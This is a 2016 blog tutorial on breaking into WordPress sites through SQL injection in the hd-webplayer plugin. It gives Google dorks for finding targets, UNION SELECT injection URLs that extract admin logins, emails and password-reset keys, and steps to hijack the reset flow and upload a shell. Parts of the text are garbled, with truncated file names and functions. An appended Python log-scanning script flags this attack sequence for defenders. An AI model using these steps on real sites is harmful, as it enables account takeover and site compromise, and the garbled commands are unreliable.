Wednesday, May 18, 2016

HOW TO WORDPRESS WEBSITE WITH SQLI VUL.+ SHELL UPLOADING



First of all we need to find a vulnerable page.
We enter this in Google:
# Dork 1 (config.p)
inurl:"/wp-content/plugins/hd-webplayer/config.p?id="

# Dork 2 (playlist.p)
inurl:"/wp-content/plugins/hd-webplayer/playlist.p?id="

# Dork 3 (general):
inurl:"/wp-content/plugins/hd-webplayer/"

Once you have found your site, you need to find the admin email and username.
I will be using this site as an example:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.p?id=3


When I add ', the text disappears, so it is vulnerable.

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Now we have 2 users.

We pick one and copy his email.
Go to the login page of the site.
It is usually here:
http://www.site.com/wp-login.p

And press "Lost your ?"

Now you enter either username or email.
We can enter both so it doesn't matter.
I entered email.



Now when you get:

"Check your e-mail for the confirmation link."

It means that the reset was successfully sent.
Now we need to get the .

Go back to the syntax you used for extracting email and username and do this:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--


http://www. website .com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user__,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Voila!
Now we just need to reset it.

Go to:
wp-login.p?action=rp&=reset&login=username

NOTE: Replace = & login=

So my link will be:

Enter new :

Login with new and shell it.
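
Seen from the defender's side, the steps above leave a recognisable sequence in the web server's access log: a request to the hd-webplayer plugin with a non-numeric id, followed by the same client using the wp-login password-reset flow. The script below is an added example, not part of the original post; it flags that sequence. The sample log lines, the IP addresses and file names in them, and the assumption that a legitimate id is a plain integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

PLUGIN_PREFIX = "/wp-content/plugins/hd-webplayer/"  # plugin path named in the post
RESET_ACTIONS = {"lostpassword", "rp", "resetpass"}  # WordPress reset-flow actions
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) ')

# Constructed sample lines (common log format); IPs, key and login are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [18/May/2016:10:00:01 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=3 HTTP/1.1" 200 512
203.0.113.7 - - [18/May/2016:10:00:09 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=3%27 HTTP/1.1" 200 0
203.0.113.7 - - [18/May/2016:10:01:30 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?id=-3+UNION+SELECT+1,2,3 HTTP/1.1" 200 640
203.0.113.7 - - [18/May/2016:10:02:10 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.7 - - [18/May/2016:10:03:45 +0000] "GET /wp-login.php?action=rp&key=CONSTRUCTED&login=editor HTTP/1.1" 200 2048
198.51.100.20 - - [18/May/2016:10:05:00 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
"""

def classify(target):
    """Label one request target as 'probe', 'reset' or None."""
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    if url.path.startswith(PLUGIN_PREFIX) and "id" in query:
        # Assumption: a legitimate id is a plain decimal integer, as in ?id=3.
        if any(not re.fullmatch(r"[0-9]+", v) for v in query["id"]):
            return "probe"
    if url.path.endswith("/wp-login.php"):
        if query.get("action", [""])[0] in RESET_ACTIONS:
            return "reset"
    return None

def find_chains(log_text):
    """Map client IP -> requests, for clients that probed the plugin and then
    touched the password-reset flow (the order of steps in the post)."""
    probed, chains = {}, {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m["target"])
        if kind == "probe":
            probed.setdefault(m["ip"], []).append(m["target"])
        elif kind == "reset" and m["ip"] in probed:
            chains.setdefault(m["ip"], list(probed[m["ip"]])).append(m["target"])
    return chains

if __name__ == "__main__":
    for ip, requests in find_chains(SAMPLE_LOG).items():
        print(ip, *requests, sep="\n  ")
```

A reset request on its own, like the one from 198.51.100.20 in the sample, is normal user behaviour and is not reported; only the combination with a non-numeric id sent to the plugin is.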
